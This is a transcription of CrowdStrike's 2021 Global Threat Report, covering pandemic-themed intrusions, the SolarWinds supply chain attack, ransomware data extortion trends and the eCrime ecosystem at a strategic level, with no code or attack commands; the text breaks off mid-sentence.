2021 Global Threat Report - Neosecure Tendencias 2021
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
2021 Global Threat Report CrowdStrike 2 Foreword ↘ E veryone reading this will likely remember the year 2020 for the rest of their lives. It was a year of hardship and grief for many, as well as tumultuous social and economic change on a global scale. For most of This annual report us in the business of stopping breaches and protecting organizations offers important lessons from cyberattacks, it was also perhaps the most active year in memory. and recommendations The onslaught was unrelenting, and for some organizations, overwhelming. As stay- for security teams at-home orders rippled around the world, we saw office blocks turn into ghost towns virtually overnight. Millions of workers retreated to hastily equipped home offices, operating in today’s creating a feeding frenzy for cyber predators spurred on by the windfall of easy environment, where access to sensitive data and networks. At the same time, fear, concern and curiosity visibility and speed are surrounding COVID-19 provided the perfect cover for a record-setting increase in social engineering attacks from both eCrime actors and targeted intrusion adversaries. more critical than ever. As the saying goes, “the devil is in the details,” and in many ways, that sums up this year’s Global Threat Report. The details revealed in these pages are derived from firsthand observations of our frontline cyber responders and analysts, coupled with insights drawn directly from the unprecedented volume of crowdsourced threat telemetry we continuously collect and dissect on behalf of our customers. Among the details you’ll learn in this report: How state-sponsored adversaries infiltrated networks to steal valuable data on vaccine research and government responses to the pandemic How criminal adversaries introduced new business models to expand their “big game hunting” ransomware activities — and made them even more potent with the addition of blackmail and extortion techniques How both eCrime and targeted intrusion adversaries stepped up their development efforts, deploying a variety of inventive new methods to evade detection and confound defenders Our annual report also offers some important lessons and recommendations for security teams operating in today’s environment. As threat actors add new tools, techniques and procedures to their arsenals, and form new alliances to bolster their strength and extend their reach, visibility and speed are more critical than ever. Security teams must become more versatile, more proactive and more productive to stay ahead of threats. CrowdStrike is committed to helping you achieve and maintain an advantage over adversaries. We’re working hard to help you secure your cloud environments, just as you would on-premises systems. We’re providing better ways for you to identify and proactively address potential vulnerabilities before they can be leveraged by attackers. We’re helping you protect identities and access, including new Zero Trust
2021 Global Threat Report CrowdStrike 3 capabilities to compartmentalize your operations, restrict data access and reduce risk to your most sensitive information. These are just a few of the ways we are pushing the envelope, expanding our protection capabilities so we can enhance and empower yours. We spent much of 2020 hoping that its unique challenges would quickly be consigned to history. Let’s hold onto that hope, but at the same time, we need to stay clear-eyed and resolute about the hurdles that lie ahead. I hope this report on recent global threat activity and trends helps you become better informed and better able to meet those challenges, so when we finally put this chapter of history behind us, we’ll be able to look back and reflect on not just our losses, but also a few victories. George Kurtz CrowdStrike CEO and Co-Founder
2021 Global Threat Report CrowdStrike 4 Table of Contents 6 Introduction 6 Introducing the eCrime Index 8 Naming Conventions 9 Threat Hunting Overview 11 2020 Trends 11 Global Pandemic Brings COVID-19 Themes and Healthcare Sector Targeting 16 StellarParticle Conducts Supply Chain Attack and Abuses O365 19 Big Game Hunters Adopt Data Extortion Methods 24 eCrime Ecosystem 25 Trends and Techniques 28 OverWatch Feature: WIZARD SPIDER Targets Financial Institution 30 eCrime Enablers 34 Targeted Intrusions 35 China 39 Russia 41 Iran 44 N. Korea 47 Other Adversaries 48 Vulnerability Intelligence 48 Exposure and Reliability 48 Interdependencies: Exploits and Credential-Based Attacks 50 Recommendations 52 About CrowdStrike 52 Products and Services
Explore The Universe ↗
2021 Global Threat Report CrowdStrike 6 Introduction ↘ A s 2021 began, the world faced the possibility that we have not entirely put the unprecedented challenges of 2020 behind us. Healthcare sector entities continue to fight the COVID-19 pandemic that, beyond the tragic human toll of the disease, fueled numerous incidents of malicious cyber CrowdStrike activity. The ransomware adversaries that proliferated in 2020 are as motivated as Intelligence offered ever, evidenced by the introduction of increasingly damaging tactics, techniques and an unparalleled procedures (TTPs). Finally, as 2020 came to a close, a major supply chain software attack racked the U.S. public sector and adjacent industries. level of coverage in 2020, adding 19 TWISTED SPIDER’s adoption of data extortion tactics was singled out in early 2020 as a direction other eCrime actors might pursue to capitalize on ransomware named adversaries infections — a preview of what would become, without exaggeration, an explosion to bring the total of of similar activity throughout the year. The allure of big game hunting (BGH) — ransomware campaigns aimed at high-value targets — dominated the ecosystem tracked actors across of eCrime enablers in 2020, spurring the market for network access brokers. BGH the globe to 149, trends also disrupted traditional targeted eCrime behavior — as seen by threat and increasing the actor CARBON SPIDER’s shift away from the targeting point-of-sale (POS) systems to join the BGH ranks. WIZARD SPIDER — a BGH actor and established eCrime number of tracked “megacorp” — sustained their high-tempo operations to become the most reported activity clusters under eCrime adversary for the second year in a row. continued monitoring Not even the global pandemic could slow the pace of targeted intrusions in 2020, to 24. nor could the large number of public disclosures regarding adversary activity in both 2019 and 2020. In continuation of a trend highlighted in 2019, Chinese adversaries targeted telecommunications, with WICKED PANDA having another prolific year, despite indictments against individuals associated with their operations. As expected, Democratic People's Republic of Korea (DPRK) adversaries sustained their currency-generation efforts. Interestingly, the blending of eCrime and targeted intrusion tactics previously associated with these North Korean actors and some Russian adversaries was also observed from Iran-nexus PIONEER KITTEN. To tackle these threats, CrowdStrike Intelligence has offered an unparalleled level of coverage, adding 19 named adversaries to bring the total of tracked actors across the globe to 149. In instances where CrowdStrike Intelligence lacks sufficient information or evidence to assign an adversary name, targeted intrusion activity is tracked as a “cluster.” In 2020, the number of tracked activity clusters under continued monitoring rose to 24. Introducing the eCrime Index The eCrime ecosystem is an active and diffuse economy of financially motivated entities that engage in myriad criminal activities in order to generate revenue. The market dynamics as observed by the CrowdStrike Intelligence team over the past several years are fluid; as new mechanisms and schemes are devised to generate revenue, new avenues of monetization are identified, and as the global geopolitical and
2021 Global Threat Report CrowdStrike 7 economic landscape changes, adversaries evolve their tactics to maximize profits. This underground economy parallels global markets in many ways. In order to understand the ebbs and flows of this ecosystem, CrowdStrike has devised a computed value to assess the state of eCrime. The eCrime Index (ECX) is based on various observables, weighted by impact, that are continuously monitored by CrowdStrike subject matter experts. The ECX helps identify notable changes that can then be further investigated. Analysis results of such events and the continuous tracker to monitor changes will be shared on the Adversary Universe website. eCRIME INDEX, FEB. 22, 2021 328.36 ↑ 123.97% ECX 400 300 200 100 0 0 20 20 0 0 0 0 0 0 0 0 1 1 21 21 1 /2 1/2 /2 /2 /2 /2 /2 /2 /2 /2 /2 /2 8/ 5/ 6/ 11/ 1/4 1/2 /7 30 /19 16 /14 11 23 1 8 1/1 1/2 1/1 /2 /2 /2 2/ 9/ 12 11/ 11/ 11/ 10 12 12 10 12 ECrime Index Upper Bound Ecrime Index Value ECrime Index Lower Bound
2021 Global Threat Report CrowdStrike 8 Naming Conventions This report follows the naming conventions instituted by CrowdStrike to categorize adversaries according to their nation-state affiliations or motivations. The following is a guide to these adversary naming conventions. Adversary Nation-State or Category BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CRANE ROK (REPUBLIC OF KOREA) JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA PANDA PEOPLE’S REPUBLIC OF CHINA SPIDER ECRIME TIGER INDIA
2021 Global Threat Report CrowdStrike 9 Threat Hunting Overview T he CrowdStrike Falcon OverWatch™ managed threat hunting team continues to observe major increases in interactive intrusion activity, as illustrated in Figure 1. In just two years, there has been a fourfold increase in the number of interactive intrusions — those involving the use of hands-on-keyboard techniques — uncovered by OverWatch. INTERACTIVE INTRUSION ACTIVITY OVER TIME 450% 400% 350% 300% 250% 200% 150% 100% 50% 0% Q1 Q2 Q3 Q4 Q1 Q2 Q3 Q4 2019 2019 2019 2019 2020 2020 2020 2020 Targeted Unattributed eCrime Figure 1. Quarterly Growth in Interactive Intrusion Campaigns by Threat Type, Q1 2019 to Q4 2020
2021 Global Threat Report CrowdStrike 10 The growth in intrusion numbers has been driven in large part by the proliferation of eCrime activity. As shown in Figure 2, eCrime intrusions made up 79% of all attributable intrusions uncovered by OverWatch in 2020. INTERACTIVE INTRUSION CAMPAIGNS BY THREAT TYPE 2019 VS. 2020 ↗ ↗ 79% 69% 2019 2020 31% 21% ↘ ↘ Targeted eCrime Figure 2. Relative Frequency of Targeted and eCrime Intrusions Uncovered by OverWatch, 2019 vs. 2020 With nearly four out of five interactive intrusions uncovered in 2020 being driven by eCrime actors, it’s imperative that these adversary groups, and methods for defending against their TTPs, deserve a great deal of attention in the coming year. However, targeted intrusions driven by state-sponsored groups should not be neglected. While the relative slice of pie representing targeted intrusions shrank in 2020 compared to 2019, it should be noted that the overall numbers of both targeted and eCrime intrusions are significantly larger than in 2019. OverWatch’s observations show that nation-state adversaries are not letting up and continue to merit strong consideration in 2021.
2021 Global Threat Report CrowdStrike 11 2020 Trends Global Pandemic Brings COVID-19 Themes and Healthcare Sector Targeting I n January 2020, medical and government personnel sought to understand the nature and potential threat of COVID-19, which had broken out in China’s Hubei province. Within weeks, the virus migrated beyond China to the rest of Asia, Europe, North America and the Middle East. By March, unprecedented stay-at-home orders were put into effect around the world to slow the spread of the disease. Concern over the growing threat of the pandemic made for valuable subject matter for criminal and targeted intrusion adversaries, who used COVID-19 themes in phishing campaigns and lures. CrowdStrike Intelligence also identified both eCrime and targeted intrusion adversaries specifically attacking the healthcare sector throughout the pandemic. Targeted Intrusions In the early days of the pandemic, objectives for targeted intrusion actors may have included acquiring information on infection rates or country-level responses to the treatment of COVID-19. However, as the pandemic accelerated, governments were faced with daunting infection rates, mounting deaths and overburdened hospitals. The search for a vaccine became of paramount importance, and the scientific information that could lead to a vaccine for COVID-19 was a high-priority collection requirement for many targeted intrusion adversaries. ↘ CrowdStrike Intelligence identified both eCrime and targeted intrusion adversaries specifically attacking the healthcare sector throughout the pandemic.
2021 Global Threat Report CrowdStrike 12 Used Targeted Targeted COVID-19 Actor Healthcare Government Themes in Sector Response Lures North Korea: LABYRINTH CHOLLIMA North Korea: SILENT CHOLLIMA North Korea: VELVET CHOLLIMA Vietnam: OCEAN BUFFALO Iran: CHARMING KITTEN Iran: STATIC KITTEN Russia: COZY BEAR (reported in open sources) China: PIRATE PANDA (suspected) China: RegionalWave activity cluster Table 1. Summary of Significant Targeted Intrusion Activity Potentially Related to the COVID-19 Pandemic NORTH KOREA While VELVET CHOLLIMA and LABYRINTH CHOLLIMA began distributing COVID- 19-themed lure documents in April 2020, this type of decoy content did not initially indicate healthcare sector targeting and instead was aimed at foreign policy officials. However, in September 2020, Falcon OverWatch detected SILENT CHOLLIMA in the environment of an Asian pharmaceutical sector organization. One month later, CrowdStrike Intelligence discovered phishing domains linked to VELVET CHOLLIMA that appear to spoof U.K., U.S. and South Korean pharmaceutical companies leading efforts on COVID-19 research. Concurrent with VELVET CHOLLIMA’s phishing activity, OverWatch detected LABYRINTH CHOLLIMA attempting to infiltrate a U.S.- based healthcare provider, and it was subsequently reported in open sources that LABYRINTH CHOLLIMA likely targeted several pharmaceutical companies involved with COVID-19 vaccine production.
2021 Global Threat Report CrowdStrike 13 VIETNAM CrowdStrike Intelligence identified a significant temporal overlap between Vietnam- based OCEAN BUFFALO’s early January 2020 targeting of Chinese private and government institutions playing critical roles in combating COVID-19, and the Vietnamese government’s very early and robust response in enacting sweeping measures to prevent the virus’s spread into the country. The severity and breadth of Vietnam’s measures stood out, as they began weeks before the first confirmed cases of COVID-19 in Vietnam and at a time when only two deaths had occurred in China. IRAN During early December 2020, CrowdStrike Intelligence identified STATIC KITTEN targeting a government entity located in the Middle East and North Africa (MENA) region. The activity consisted of credential collection via a known variant of Mimikatz, lateral movement, and the probable staging of documents related to COVID-19 for exfiltration. The healthcare sector has been a target of STATIC KITTEN since January 2020, suggesting that the adversary’s priorities in 2020 included an expanded focus on health-related topics even prior to the outbreak of COVID-19. RUSSIA In July 2020, the U.S., U.K. and Canadian governments released information describing a COZY BEAR campaign that targeted COVID-19 research facilities. This campaign was reportedly conducted throughout 2020 and was likely intended to steal information relating to the development and testing of vaccines targeting the virus. CHINA In July 2020, the U.S. Department of Justice (DOJ) indicted two Chinese nationals with alleged ties to the Chinese Ministry of State Security (MSS) for wide-ranging cyber operations, the most recent of which reportedly included targeting U.S.- based COVID-19 research centers. Intelligence officials in Spain also claimed that a China-nexus actor had successfully stolen information relating to COVID-19 vaccine development from Spanish research institutes in September 2020. In addition to this reported activity, CrowdStrike identified five suspected China-origin campaigns targeting healthcare entities in 2020. eCrime BGH TARGETING HEALTHCARE SECTOR Even under normal operating conditions, the healthcare vertical faces a significant threat from criminal groups deploying ransomware, the consequences of which can include the disruption of critical care facilities. Along with the possibility of significant disruption to critical functions, victims face a secondary threat from ransomware operations that exfiltrate data prior to the execution of the ransomware, a trend observed across all sectors throughout 2020 (see the section “Big Game Hunters Adopt Data Extortion Methods”).
2021 Global Threat Report CrowdStrike 14 ↘ Amid the pandemic, the healthcare sector proved to be a controversial target among BGH operators. Some adversaries — including TWISTED SPIDER, VIKING SPIDER, GRACEFUL SPIDER and TRAVELING SPIDER — publicly announced intentions to WIZARD SPIDER avoid targeting frontline healthcare entities. Others, including DOPPEL SPIDER, actively targeted the said that any unintentional infections against a healthcare provider would be quickly healthcare sector in Q4 resolved by providing decryption keys without requiring payment. An incident 2019, and the rise of Ryuk affecting a Germany-based hospital triggered such a response in September infections in October 2020 2020. Despite these assertions, CrowdStrike Intelligence confirmed that 18 BGH demonstrated a repetition ransomware families infected 104 healthcare organizations in 2020, with the most in targeting preferences. prolific being TWISTED SPIDER using Maze, and WIZARD SPIDER using Conti. In some cases, adversaries may have avoided targeting hospitals, but proceeded with Similarly, this adversary attacks against pharmaceutical and biomedical companies. focused on the academic As depicted in Figure 3, TWISTED SPIDER achieved at least 26 infections at sector during September- healthcare sector victims with their Maze and Egregor ransomware families, October 2019 and again predominantly at U.S.-based entities. WIZARD SPIDER conducted 25 attacks in 2020 as students against the healthcare industry with both Conti and Ryuk. Throughout October were returning to school 2020, Ryuk was heavily attributed to a large number of infections against U.S.-based following summer vacation. healthcare entities, a surge that occurred despite a concerted disruption effort by cybersecurity vendors in September 2020. This surge also prompted a response by These trends indicate law enforcement on Oct. 28, 2020, when the U.S. Federal Bureau of Investigation a degree of planning by (FBI) issued an alert warning of attacks involving WIZARD SPIDER’s TrickBot leading WIZARD SPIDER to target to ransomware infections and disruption to healthcare services. certain verticals at times of the year when ransomware campaigns would have the HEALTHCARE VICTIMS BY RANSOMWARE FAMILY IN 2020 most significant impact. ↙ Infection Count 25 Even in a non-pandemic year, Q4 targeting of the healthcare sector would coincide with the start of 20 the cold and flu season. 15 10 5 0 Maze Conti Netwalker Revil Ryuk DoppelPaymer Egregor Pysa Defray777 Clop LockBit MedusaLocker Nemty X RagnarLocker Avaddon Ekans MountLocker SunCrypt ↖ Ransomware Family Figure 3. Confirmed Healthcare Sector Victim Count by Ransomware Family in 2020
2021 Global Threat Report CrowdStrike 15 TRENDS IN ECRIME PHISHING THEMES Social engineering techniques are frequently used by criminally motivated threat actors to tailor phishing campaigns, malspam emails and fraudulent scams. The psychology behind many of these techniques is to prey on human emotions and behavior, the most exploitable of which are greed, curiosity, fear and the desire to help. The COVID-19 pandemic provided criminal actors with a unique opportunity to use lure content and social engineering techniques capable of targeting each of these components of human behavior. As a topic, COVID-19 has global impact, 24-hour news coverage and as of this writing, no clear end in sight. Pandemic-Related eCrime Phishing Themes Exploitation of individuals looking for details on disease tracking, testing and treatment Impersonation of medical bodies, including the World Health Organization (WHO) and U.S. Centers for Disease Control and Prevention (CDC) Financial assistance and government stimulus packages Tailored attacks against employees working from home Scams offering personal protective equipment (PPE) Passing mention of COVID-19 within previously used phishing lure content (e.g., deliveries, invoices and purchase orders) Table 2. eCrime Phishing Themes Referencing COVID-19 Like pre-pandemic phishing campaigns, these attacks attempted to encourage a human response — either to interact with a hyperlink or attachment to an email, or to attract visitor traffic via online searches. By the summer of 2020, criminal actors began to return to previously popular lure content, albeit with some references to COVID-19 added. Outlook COVID-19 has significantly impacted economic, social, religious, business and political spheres. The numerous targeted intrusion operations against healthcare sector entities underscore the value that vaccine-related intellectual property had in 2020 and going forward. With the recent authorization and release of vaccines, vaccination rollout plans will likely become a target of intelligence-gathering efforts by state- sponsored adversaries in 2021. Variations on COVID-19 themes arising this year will likely include lure content referencing vaccinations or new variants of the disease.
2021 Global Threat Report CrowdStrike 16 StellarParticle Conducts Supply Chain Attack iconsand Abuses O365 O n Dec. 13, 2020, public reporting revealed details of a sophisticated Targeted Industries supply chain attack against the update deployment mechanism of the SolarWinds Orion IT management software. The adversary responsible used this operation to distribute and install malicious code, dubbed SUNBURST. Because of the nature of this initial intrusion vector, Education deployments of malicious code have been observed and reported by a large number of organizations spread across multiple verticals worldwide. Government Initial Access and Exploitation Technology Analysis of a virtual machine used in the software build provided insight into the way the build process was hijacked by the adversary — tracked by CrowdStrike as the StellarParticle activity cluster. StellarParticle installed a monitoring tool tracked by CrowdStrike Intelligence as SUNSPOT, which detects the beginning of the Energy Orion packages build and replaces one of the source code files with a backdoored version containing both an execution path inserted in the legitimate Orion code, and SUNBURST’s source code. The design of SUNSPOT suggests StellarParticle Healthcare developers invested significant efforts into ensuring the tampering process worked properly, and added strong conditions to avoid revealing their presence in the build environment to SolarWinds developers. Once installed, SUNBURST has the ability to collect information about the host, enumerate files and services on the system, make HTTP requests to arbitrary URLs, write/delete/execute arbitrary files, modify registry keys, terminate processes and reboot the system. These capabilities enable StellarParticle to verify whether a victim host is of further interest prior to the deployment of additional malicious code. Analysis of this activity indicates the distribution of the backdoored updates of SolarWinds Orion likely started on or around March 24, 2020. SUNBURST hides in plain sight by using source code naming conventions similar to those of SolarWinds’ developers, as well as by using two different communication channels for command and control (C2), based on DNS requests camouflaging as Amazon Web Services (AWS) traffic and on HTTP requests with the same structure as SolarWinds’ Orion Improvement Program (OIP) telemetry traffic. Strong execution guardrails were added to the backdoor to evade detection with various techniques, which in particular include tampering with security software services in order to disable them.
2021 Global Threat Report CrowdStrike 17 Post-Exploitation Although the SUNBURST C2 infrastructure ceased to operate on or around Oct. 6, 2020, post-exploitation of the initial access obtained using the backdoor continued into December 2020 and may still be ongoing. Industry reporting identified post- exploitation actions associated with this activity that include the deployment of next- stage tooling, such as TEARDROP and Cobalt Strike, through SUNBURST, as well as hands-on-keyboard activity using PowerShell to interact with various enterprise network services. Targeting of internal services includes a reported interest in Active Directory (AD) credential compromise, email collection and cloud infrastructure lateral movement. Analysis of the backdoor suggests that only a subset of the victims that experienced SUNBURST infections actually received post-exploitation tasking from StellarParticle operators, although the exact scope selected by the adversary remains unclear. Pandemic-Related eCrime Phishing Themes Initial test modifications to Orion code base, as reported by September 2019 SolarWinds Dec. 6, 2019 Beacon C2 domain registered Feb. 27, 2020 Beacon C2 domain first resolves to an IP address SSL certificate first associated with a known secondary C2 March 3, 2020 domain Compile time of first known malicious update containing March 24, 2020 SUNBURST code March 31, 2020 First known date of malicious update distribution Table 3. Timeline of Supply Chain Attack Infrastructure The StellarParticle adversary took noticeable steps to avoid common operational security (OPSEC) mistakes in the process of registering and managing infrastructure. The only technical overlap between all of the known domains was the purchase of SSL certificates issued by commercial certificate authority Sectigo, but this is too widely used to aid with analytical pivots. There is no IP address overlap between domains, as each is hosted on separate cloud or VPS infrastructure. Additionally, the actor used multiple registrars and hosting services for the domains and servers. The adversary did not register domains in bulk, preferring to buy old and comparatively expensive domains, likely to obtain more reputable infrastructure.
2021 Global Threat Report CrowdStrike 18 Abuse of O365 In addition to the deployment of the SUNBURST backdoor, the StellarParticle actors demonstrated exceptional knowledge of Microsoft O365 and the Azure environment. Other victims of this intrusion have since come forward who have reported that O365 was a consistent target of the adversary. In CrowdStrike’s own experience, it was determined this adversary successfully targeted a Microsoft Reseller and used delegated access meant to allow the reseller to audit licenses to abuse O365 Oauth applications to unsuccessfully target email. StellarParticle’s comfort and capabilities in abusing Azure and O365 demonstrate they have a detailed understanding of the authentication and access controls associated with those platforms. Attribution Public reports have suggested an attribution of the StellarParticle activity cluster to the Russian Foreign Intelligence Service of the Russian Federation (SVR), an organization associated by CrowdStrike Intelligence to COZY BEAR. However, as of February 2021, CrowdStrike Intelligence does not attribute StellarParticle activity to a named adversary or geographic nexus. StellarParticle Activity Cluster Motivation Espionage Likely state-sponsored SUNBURST Reconnaissance and first-stage loader malware Monitoring tool that detects the beginning of an Orion Toolkit SUNSPOT package build and replaces one of the source code files with a backdoored version TEARDROP Custom in-memory loader used to drop Cobalt Strike Table 4. StellarParticle Summary Outlook Supply chain attacks are nothing new; CrowdStrike publicly raised them as a rising threat as far back as 2018 and believes they will continue to be a major intrusion vector. Supply chain attacks represent a unique initial access tactic that provides malicious actors with the ability to propagate from a single intrusion to multiple downstream targets of interest. In addition to software-based attacks, such as the one that affected SolarWinds, supply chain attacks can take the form of hardware or third-party compromises. CrowdStrike Intelligence has identified supply chain and trusted relationship compromises originating from both eCrime and targeted intrusion adversaries. eCrime actors commonly use the access from these compromises for financial gain, generally deploying ransomware and mineware, whereas targeted intrusion adversaries primarily use compromises to deploy espionage-driven toolsets to a broad set of users. Given the potential high return on investment for threat actors, CrowdStrike Intelligence anticipates these attacks will continue to threaten organizations across all sectors in 2021.
2021 Global Threat Report CrowdStrike 19 Big Game Hunters Adopt Data Extortion Methods S ince the original BGH adversary — BOSS SPIDER — was identified in January 2016, CrowdStrike Intelligence has observed both established criminal actors (e.g., INDRIK SPIDER and WIZARD SPIDER) and ransomware operators adopting and reimagining BGH tactics. Throughout 2020, BGH continued to be a pervasive threat to companies worldwide across all verticals, with CrowdStrike Intelligence having identified at least 1,377 unique BGH infections. Notable in 2020 was the growing trend of ransomware operators threatening to leak data from victim organizations, and in some cases actively doing so. This tactic was highly likely intended to pressure victims to make payment, but is also likely in response to improved security practices by companies that could negate encryption of their files by recovering from backups. Data extortion is not a tried-and-true tactic, and even the act of combining data extortion with a ransomware operation is not new to 2020 — OUTLAW SPIDER first employed this tactic in May 2019. What marks a departure from previous BGH operations is the accelerated adoption of the data extortion technique and the introduction of dedicated leak sites (DLSs) associated with specific ransomware families. These approaches were adopted by at least 23 ransomware operators in 2020. MOST ACTIVE BGH ADVERSARIES WITH DEDICATED LEAK SITES ↙ Total 500 450 400 350 300 250 200 150 100 50 0 TWISTED SPIDER UNID VIKING SPIDER SPRITE SPIDER RIDDLE SPIDER PINCHY SPIDER CIRCUS SPIDER WIZARD SPIDER DOPPEL SPIDER CARBON SPIDER GRACEFUL SPIDER TRAVELING SPIDER ↖ Adversary Figure 4. Most Active BGH Adversaries with DLSs in 2020
2021 Global Threat Report CrowdStrike 20 Among the threat actors using DLSs and data extortion are the operators of a crop of new ransomware families identified in 2020. In addition, some existing BGH adversaries introduced new ransomware variants, and CARBON SPIDER followed GRACEFUL SPIDER’s lead of transitioning their targeted eCrime operations into BGH, launching their own ransomware-as-a-service (RaaS) operation. Date DLS Date Identified Threat Discovered December 2019 VIKING SPIDER’s Ragnar Locker Feb. 10, 2020 Jan. 10, 2020 EKANS N/A Jan. 17, 2020 LockBit Sept. 15, 2020 Ragnarok (no known relationship to VIKING January 2020 Sept.20, 2020 SPIDER) January 2020 CIRCUS SPIDER’s NetWalker May 12, 2020 March 14, 2020 TRAVELING SPIDER’s Nemty X March 26, 2020 March 20, 2020 ProLock April 25, 2020 March 25, 2020 Sekhmet March 25, 2020 May 16, 2020 INDRIK SPIDER's WastedLocker N/A Late May 2020 WIZARD SPIDER’s Conti Aug. 21, 2020 June 1, 2020 RIDDLE SPIDER's Avaddon Aug. 10, 2020 July 30, 2020 SPRITE SPIDER’s Defray777 Linux version Nov. 29, 2020 Aug. 1, 2020 CARBON SPIDER’s DarkSide Nov. 16, 2020 Aug. 12, 2020 SunCrypt Aug. 26, 2020 Aug. 17, 2020 MountLocker Sept. 25, 2020 Sept. 24, 2020 TWISTED SPIDER’s Egregor Sept. 24, 2020 Late October 2020 PIONEER KITTEN’s Pay2Key Nov. 10, 2020 Table 5. BGH Ransomware Families That Emerged in 2020
2021 Global Threat Report CrowdStrike 21 Variations on the Approach BGH adversaries took different approaches in the release of data onto a DLS, with many staggering the release of victims’ stolen data. TWISTED SPIDER became the most adept at this technique, spacing out releases in percentages of the total exfiltrated dataset. Other adversaries using the percentage release method include WIZARD SPIDER with Conti victims, and the operators of MountLocker ransomware. An alternative approach is to release the datasets in numbered “parts,” a technique preferred by RIDDLE SPIDER and VIKING SPIDER, both of which seemingly choose the release date manually. CARBON SPIDER developed an automated system that displays a predetermined publication time set by an automated countdown timer. Less commonly observed is the release of data by type, where the adversary creates datasets for personally identifiable information (PII), financial records, sensitive company data, and information pertaining to partners and customers, and then releases these datasets at separate intervals. For some victims with higher brand recognition, each new release can trigger renewed reporting on the incident across social media platforms or by news outlets. VIKING SPIDER has adopted this approach with some victims, as have affiliates of PINCHY SPIDER for a small number of REvil victims. Whichever release method is chosen by the adversary, the intent is almost certainly to increase pressure on the victim company to pay the ransom. Targeting Although most ransomware operations are opportunistic, CrowdStrike Intelligence identified the highest number of ransomware-associated data extortion operations this year in the industrial and engineering sector (229 incidents), closely followed by the manufacturing sector (228 incidents). The manufacturing industry is particularly vulnerable to ransomware operations. Not only does the industry suffer the normal consequences of a ransomware infection, but a disruption in day-to-day operations would greatly affect the core business if a company were unable to meet production demands due to system outages. ↘ Although most ransomware operations are opportunistic, CrowdStrike Intelligence identified the highest number of ransomware-associated data extortion operations this year in the industrial and engineering sector, closely followed by the manufacturing sector.
0 20 40 60 80 100 120 140 160 180 200 220 240 0 20 40 60 80 100 120 140 160 180 200 220 240 Engineering Industrials & Engineering anufacturing Manufacturing ↙ Total ↙ Total 2021 Global Threat Report Technology Technology Retail Retail Healthcare Healthcare ncial Services Financial Services onal Services Professional Services Government Government Logistics Logistics Legal Legal Hospitality Hospitality Energy Energy Automotives Automotives Media Media umer Goods Consumer Goods INDUSTRIES AFFECTED BY DATA LEAKS Nonprofit Nonprofit Academic Academic Figure 5. Industries Targeted by Data Extortion Related to BGH Operations munications Telecommunications Real Estate Real Estate Agriculture Agriculture Utilities Utilities Chemicals Chemicals ransportation Transportation uter Gaming Computer Gaming CrowdStrike Aerospace Aerospace Extractive Extractive Aviation Aviation Defense Defense ↖ Industries 22
2021 Global Threat Report CrowdStrike 23 TWISTED SPIDER and the Maze Cartel While OUTLAW SPIDER was the first to be observed using data extortion in a ransomware campaign, TWISTED SPIDER — operators of Maze and Egregor ransomware — has been credited with being the catalyst for the heavy adoption of this technique in 2020. TWISTED SPIDER was the first ransomware actor to launch a DLS, which was created on Dec. 10, 2019. In June 2020, following an explosion of dedicated leak sites in the first half of the year, TWISTED SPIDER branded themselves the leader of the “Maze Cartel,” which was a cooperative effort between them, VIKING SPIDER, and the operators of LockBit ransomware, as well as unconfirmed involvement from the operators of SunCrypt and WIZARD SPIDER. The Maze Cartel shared leaked data from their operations on each of their DLSs in a likely effort to reach a wider audience, thus putting more pressure on victim companies. TWISTED SPIDER announced the cessation of Maze operations in November 2020, declaring the Maze Cartel never existed. CrowdStrike Intelligence assesses the group has likely rebranded itself and now deploys Egregor ransomware. This assessment is based on code overlap between Maze and Egregor, an influx in Egregor activity coinciding with a decline in Maze infections, and similar tactics and layout of the associated DLS (including leaking victim data in percentage increments). Despite the demise of Maze, cartels may continue to be created as needed. On Dec. 22, 2020, a new post made to MountLocker ransomware’s Tor-hosted DLS was titled “Cartel News” and included details of a victim of VIKING SPIDER’s Ragnar Locker. Publicizing each other’s operations will likely contribute to the reputation of BGH operators. If tactics evolve and the adversaries begin to use different hosting locations for each other’s victim data, it could hinder the ability for a victim to negotiate the removal and/or destruction of stolen information, further increasing the risk of it being shared, sold or auctioned to other eCrime actors. Outlook Data theft and the use of a DLS have arguably become as engrained in the BGH ransomware operation as the encryption process itself. Throughout 2020, the BGH landscape became increasingly postured toward incentivizing the victim to engage in ransom negotiations once they have been infected with ransomware. In October 2020, the operators of SunCrypt ransomware used a distributed denial-of-service (DDoS) attack to compel a victim to pay a ransom, introducing a new variation of the strong-arm tactics that BGH adversaries became known for in 2020. Denial of access to mission-critical resources, as demonstrated by this SunCrypt operation, is a potentially fruitful avenue for BGH actors to expand upon.
2021 Global Threat Report CrowdStrike 24 eCrime Ecosystem T he eCrime ecosystem remains vast and interconnected, with many criminal enterprises existing to support big game hunting operations. Notable to 2020 is the pivotal role access brokers play in the eCrime ecosystem, supporting a variety of actors to include BGH ransomware operators. LUNAR SPIDER and MALLARD SPIDER have also been observed using their capabilities to adopt this role as well. Throughout 2020, CrowdStrike Intelligence observed a number of dramatic changes for targeted eCrime actors. CARBON SPIDER shifted away from point-of-sale (POS) campaigns in favor of BGH, ultimately introducing their own ransomware, DarkSide. Established eCrime actors like MUMMY SPIDER, WIZARD SPIDER and CARBON SPIDER continue to drive innovation in the world of malware development. Over the year, CrowdStrike Intelligence noted trends in the use of open-source obfuscation software and the targeting of virtualization environments pioneered by these adversaries. ↘ Notable to 2020 is the pivotal role access brokers play in the eCrime ecosystem, supporting a variety of actors to include BGH ransomware operators.
2021 Global Threat Report CrowdStrike 25 Trends and Techniques Increasing Importance of Access Brokers Access brokers are threat actors that gain backend access to various organizations (both corporations and government entities) and sell this access either on criminal forums or through private channels. When criminal malware operators purchase access, it eliminates the need to spend time identifying targets and gaining access, allowing for increased and quicker deployments as well as higher potential for monetization. Some access brokers escalate privileges to the domain administrator level (often advertised as “full access”), while other access brokers just provide the credentials and endpoints necessary to gain access. The use of access brokers has become increasingly common among BGH actors and aspiring ransomware operators. CrowdStrike Intelligence has observed some access brokers associated with affiliates of RaaS groups. Access brokers advertising on criminal forums likely use logs from commodity information stealers to aid in operations, and some actors may sell the credentials from these logs as claimed access. The information stealer logs typically contain data such as IP addresses, endpoint URLs, login credentials, screenshots of the victim's desktop, cookies, and browser autofill history that can be used to determine the type of system used as well as provide a vector for initial access. CrowdStrike Intelligence has observed one access broker, known to be an affiliate of a ransomware program, confirm they purchased logs to aid in their operations. Malware Obfuscation Implemented Into Build Processes In 2020, CrowdStrike Intelligence observed WIZARD SPIDER and MUMMY SPIDER implement open-source software protection tools into their malware build processes. This technique was observed with 